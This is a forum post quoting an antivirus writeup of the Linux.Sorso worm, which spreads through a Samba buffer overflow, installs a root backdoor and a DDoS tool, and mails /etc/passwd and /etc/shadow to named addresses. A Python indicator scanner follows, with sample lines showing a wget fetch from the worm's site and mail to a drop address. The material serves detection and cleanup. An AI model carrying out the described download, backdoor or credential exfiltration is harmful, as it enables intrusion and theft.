I had caught it, and Norton on Windows found it for me!!!!!!
________________________________________
Linux.Sorso
Discovered on: July 02, 2003
Last Updated on: July 30, 2003 07:05:26 PM
Linux.Sorso is a worm that replicates using a Samba buffer overflow exploit. The worm targets vulnerable installations of the Samba server version 2.2.8a and earlier, version 2.0.10 and earlier, and Samba-TNG version 0.3.2 and earlier. The worm also contains code for a backdoor and a Distributed Denial of Service (DDoS) attack and only affects Linux running on Intel x86 platforms.
Also Known As: Worm.Linux.Sorso.a, Backdoor.Linux.Sorso (AVP)
Type: Zoo Worm
Systems Affected: Linux
Systems Not Affected: Windows 3.x, Windows 95, Windows 98, Windows NT, Windows 2000, Windows XP, Windows Me, Microsoft IIS, Macintosh, OS/2, UNIX
Protection
Virus Definitions (Intelligent Updater) *: July 03, 2003
Virus Definitions (LiveUpdate™) **: July 09, 2003
* Intelligent Updater definitions are released daily, but require manual download and installation.
** LiveUpdate virus definitions are usually released every Wednesday.
Technical Details
When Linux.Sorso is executed, it performs the following actions:
1. Tries to establish an anonymous SMB session with a Samba server.
2. Sends a TRANS2_OPEN2 request with invalid parameters containing exploit code.
NOTE: The worm uses a Linux shell code exploit, which runs only on Intel x86 platforms.
3. Sends a shell command sequence to the remote shell, which causes the server to download the files from http://www.jx263.com/.
4. Extracts the downloaded files to /usr/lib/.lib and starts a script called start.sh. This requires the presence of the shell command /bin/sh, wget, and tar in the PATH to properly execute.
5. Adds several cron jobs to be executed. These jobs include an exploit program to spread itself, a hijacked version of http daemon, a hijacked ps command, a backdoor, and a DDoS program.
6. Mails the server's IP address, with the /etc/hosts, /etc/passwd, and /etc/shadow files, to hyukie54@163.com and nihao16897888@21cn.com.
7. Scans random class C-sized networks for Samba hosts and tries to exploit each one found.
8. Replaces the existing http daemon with a hijacked version, allowing Web access to any file on the machine.
9. Hides running processes, which the worm created, using the hijacked ps command.
10. Replaces /sbin/klogd with a backdoor program. Upon receiving an ICMP packet of a specific size, the backdoor program binds to a fixed TCP port and provides a shell running as root.
11. Generates a list of possible IPs on a random class C-sized network once a day and adds them to a file. The DDoS program goes through every IP address in the file and sends an ICMP request to that particular IP, using a spoofed source address. As a result, all the ICMP echo response packets go to the spoofed IP address and create an ICMP DDoS attack. The spoofed source IP address is www.rising.com.cn.
Removal Instructions
Once Linux.Sorso attacks a computer, it is difficult to determine what else the computer has been exposed to. In most cases, changes other than those made by the threat will not have occurred. However, the author of the threat may have been able to use the threat to access the computer to make changes to it. Unless you can be absolutely sure that malicious activity has not been performed on the computer, we recommend completely re-installing the operating system.
________________________________________
I guess I need to install some antivirus... what do you recommend?
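The writeup quoted above names a small set of host-side artefacts: the hidden /usr/lib/.lib directory with its start.sh, cron jobs pointing into that directory, the download site www.jx263.com and the two mail drop addresses. The script below is an added example (not from the forum post or the Symantec writeup) that checks a filesystem root, a set of crontab lines and a set of log lines for exactly those indicators; the sample crontab and log lines embedded in it are constructed for the demo, and the temporary root built by `demo()` stands in for a real system.

```python
"""
Indicator check for the Linux.Sorso artefacts listed in the writeup:
the hidden /usr/lib/.lib directory and its start.sh script, cron jobs
that run anything from that directory, and the download/mail hosts the
worm contacts. Added example; it assumes only the paths and addresses
the writeup gives and makes no attempt to identify other variants.
"""
import os
import tempfile

# Filesystem artefacts, kept relative so a scan can be pointed at any root
# (a mounted disk image, a chroot, or "/" for the live system).
HIDDEN_DIR = "usr/lib/.lib"
START_SCRIPT = "usr/lib/.lib/start.sh"

# Download site and the two mail drops named in the writeup. The full
# addresses are used rather than the bare mail domains, because 163.com
# and 21cn.com are large public providers and would otherwise match
# ordinary traffic.
NETWORK_INDICATORS = (
    "www.jx263.com",
    "hyukie54@163.com",
    "nihao16897888@21cn.com",
)


def filesystem_hits(root="/"):
    """Return the absolute artefact paths that exist under `root`."""
    hits = []
    for rel in (HIDDEN_DIR, START_SCRIPT):
        if os.path.exists(os.path.join(root, rel)):
            hits.append("/" + rel)
    return hits


def cron_hits(cron_lines):
    """Return crontab entries (comments skipped) that execute from the hidden directory."""
    return [
        line for line in cron_lines
        if not line.lstrip().startswith("#") and "/usr/lib/.lib" in line
    ]


def host_hits(text_lines):
    """Return (line, indicator) pairs for lines mentioning a known host or address."""
    out = []
    for line in text_lines:
        lowered = line.lower()
        for indicator in NETWORK_INDICATORS:
            if indicator in lowered:
                out.append((line, indicator))
                break
    return out


# Constructed sample crontab: one benign entry, two pointing into the hidden directory.
SAMPLE_CRON = [
    "# constructed sample crontab for the demo",
    "0 3 * * * /usr/bin/find /tmp -mtime +7 -delete",
    "*/10 * * * * /usr/lib/.lib/scan",
    "0 0 * * * /usr/lib/.lib/ddos",
]

# Constructed sample log lines: a download from the named site, a benign request,
# and an outbound mail to one of the drop addresses.
SAMPLE_LOG = [
    "wget http://www.jx263.com/ -O /tmp/x",
    "GET /index.html HTTP/1.0 from 10.0.0.5",
    "sendmail: message to hyukie54@163.com accepted for delivery",
]


def demo():
    """Build a throwaway root containing the worm's directory layout and scan it."""
    root = tempfile.mkdtemp(prefix="sorso-demo-")
    os.makedirs(os.path.join(root, HIDDEN_DIR))
    with open(os.path.join(root, START_SCRIPT), "w") as fh:
        fh.write("#!/bin/sh\n# constructed placeholder, not the worm's script\n")
    return filesystem_hits(root)


if __name__ == "__main__":
    print("filesystem:", demo())
    print("cron:", cron_hits(SAMPLE_CRON))
    print("hosts:", host_hits(SAMPLE_LOG))
```

Run it against a live machine with `filesystem_hits("/")`, the output of `crontab -l` for root, and whatever mail or proxy logs are available. Because the writeup says ps and klogd are replaced, a process listing from the suspect host cannot be trusted; verify those binaries against the package manager (`rpm -V` on RPM systems, `debsums` on Debian-based ones) or from a clean boot medium, and treat any hit as confirmation that the reinstall the writeup recommends is the right call.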